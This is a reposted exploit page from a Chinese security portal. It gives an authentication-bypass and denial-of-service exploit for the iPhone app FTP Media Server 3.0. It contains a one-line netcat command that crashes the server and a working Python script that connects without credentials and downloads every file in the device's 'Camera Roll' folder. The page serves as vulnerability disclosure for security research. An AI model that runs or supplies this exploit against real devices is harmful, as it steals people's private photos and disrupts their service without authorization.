首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FTP Media Server 3.0 - Authentication Bypass and Denial of Service Exploit
来源:http://www.mikeallen.org 作者:Wh1t3Rh1n0 发布时间:2015-05-27  
#!/usr/bin/env python
#==================================================================================
# Exploit Title: FTP Media Server 3.0 - Authentication Bypass and Denial of Service
# Date: 2015-05-25
# Exploit Author: Wh1t3Rh1n0 (Michael Allen)
# Exploit Author's Homepage: http://www.mikeallen.org
# Software Link: https://itunes.apple.com/us/app/ftp-media-server-free/id528962302
# Version: 3.0
# Tested on: iPhone
#==================================================================================
# ------------------
# Denial of Service:
# ------------------
# The FTP server does not properly handle errors raised by invalid 
# FTP commands. The following command, which sends an invalid PORT command to 
# the FTP server, will crash the server once it is received.
   
# echo -en "PORT\r\n" | nc -nv 192.168.2.5 50000
   
# ----------------------
# Authentication Bypass:
# ----------------------
# The FTP server does not handle unauthenticated connections or incorrect login
# credentials properly. A remote user can issue commands to the FTP server 
# without authenticating or after entering incorrect credentials.
   
# The following proof-of-concept connects to the given FTP server and 
# downloads all files stored in the "Camera Roll" folder without providing a
# username or password:
   
import sys
from ftplib import FTP
   
if len(sys.argv) <= 1:
    print "Usage: ./ftp-nologin.py [host] [port]"
    exit()
   
host = sys.argv[1]    
port = int(sys.argv[2])
   
files = []
   
def append_file(s):
    files.append(s.split(' ')[-1])
   
blocks = []
def get_blocks(d):
    blocks.append(d)
   
ftp = FTP()
print ftp.connect(host, port)
ftp.set_pasv(1)
ftp.cwd("Camera Roll")
print ftp.retrlines('LIST', append_file)
   
files.pop(0)
   
for filename in files:
    print "Downloading %s..." % filename
    ftp.retrbinary('RETR /Camera Roll/' + filename, get_blocks)
   
    f = open(filename, 'wb')
    for block in blocks:
        f.write(block)
    f.close()
    print "[+] File saved to: %s" % filename
       
    blocks = []
   
ftp.quit()
  
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Samba 3.0.37 EnumPrinters 堆内
·Apache Jackrabbit WebDAV XXE E
·Lenovo System Update Privilege
·ESC 8832 Data Controller Multi
·Fuse - Local Privilege Escalat
·Apport/Ubuntu - Local Root Rac
·ZOC SSH Client Buffer Overflow
·Private Shell SSH Client 3.3 -
·OpenLitespeed 1.3.9 - Use Afte
·D-Link Devices UPnP SOAPAction
·QEMU - Floppy Disk Controller
·Airties login-cgi Buffer Overf
  推荐广告
CopyRight © 2002-2025 VFocuS.Net All Rights Reserved